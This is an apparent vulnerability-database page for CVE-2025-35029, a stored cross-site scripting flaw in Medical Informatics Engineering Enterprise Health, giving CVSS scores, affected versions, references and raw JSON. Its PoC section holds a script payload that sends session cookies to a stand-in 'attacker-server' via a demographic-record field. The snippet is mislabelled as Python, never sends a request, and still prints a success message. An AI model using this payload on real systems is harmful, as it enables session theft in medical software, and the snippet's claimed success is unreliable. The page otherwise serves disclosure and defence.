Security Vulnerability Report
中文
CVE-2025-35029 CVSS 3.5 LOW

CVE-2025-35029

Published: 2025-11-20 20:16:22
Last Modified: 2025-12-31 13:51:52
Source: 9119a7d8-5eab-497f-8521-727c672e3725

Description

Medical Informatics Engineering Enterprise Health has a stored cross site scripting vulnerability that allows an authenticated attacker to add arbitrary content in the 'Demographic Information' page. This content will be rendered and executed when a victim accesses it. This issue is fixed as of 2025-03-14.

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:mieweb:enterprise_health:rc202309:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mieweb:enterprise_health:rc202403:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mieweb:enterprise_health:rc202409:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:mieweb:enterprise_health:rc202503:-:*:*:*:*:*:* - VULNERABLE
Medical Informatics Engineering Enterprise Health < 2025-03-14修复版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-35029 PoC - Stored XSS in Medical Informatics Engineering Enterprise Health // This PoC demonstrates the stored XSS vulnerability in the Demographic Information page // Step 1: Authenticate with low-privilege account const loginEndpoint = 'https://target-system/api/auth/login'; const credentials = { username: 'attacker_account', password: 'password123' }; // Step 2: Inject malicious XSS payload into Demographic Information page const xssPayload = '<script>\n' + ' // Steal session cookies ' + ' fetch("https://attacker-server/steal?cookie=" + encodeURIComponent(document.cookie))\n' + ' // Or perform actions on behalf of the victim ' + ' // fetch("https://target-system/api/user/profile", {credentials: "include"}) ' + '</script>'; // Step 3: Submit the payload through the vulnerable endpoint const exploitEndpoint = 'https://target-system/api/demographic/update'; const exploitData = { firstName: 'John' + xssPayload, lastName: 'Doe', dateOfBirth: '1990-01-01', address: '123 Main St' }; // The malicious script will be stored and executed when other users view the page console.log('XSS payload injected successfully');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-35029", "sourceIdentifier": "9119a7d8-5eab-497f-8521-727c672e3725", "published": "2025-11-20T20:16:22.187", "lastModified": "2025-12-31T13:51:52.017", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Medical Informatics Engineering Enterprise Health has a stored cross site scripting vulnerability that allows an authenticated attacker to add arbitrary content in the 'Demographic Information' page. This content will be rendered and executed when a victim accesses it. This issue is fixed as of 2025-03-14."}], "metrics": {"cvssMetricV40": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "9119a7d8-5eab-497f-8521-727c672e3725", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mieweb:enterprise_health:rc202309:-:*:*:*:*:*:*", "matchCriteriaId": "313C4F66-3A0D-4D92-8A29-E7A702BD7B18"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mieweb:enterprise_health:rc202403:-:*:*:*:*:*:*", "matchCriteriaId": "14451950-A4FB-4C7E-952B-14D79C69DBF6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mieweb:enterprise_health:rc202409:-:*:*:*:*:*:*", "matchCriteriaId": "AB261E9D-31AE-4767-8CC2-2FDD0E4F25BB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mieweb:enterprise_health:rc202503:-:*:*:*:*:*:*", "matchCriteriaId": "02F65A46-C9FE-4782-B2BA-91230A3D879F"}]}]}], "references": [{"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-272-01.json", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Vendor Advisory"]}, {"url": "https://www.cve.org/CVERecord?id=CVE-2025-35029", "source": "9119a7d8-5eab-497f-8521-727c672e3725", "tags": ["Third Party Advisory", "US Government Resource"]}]}}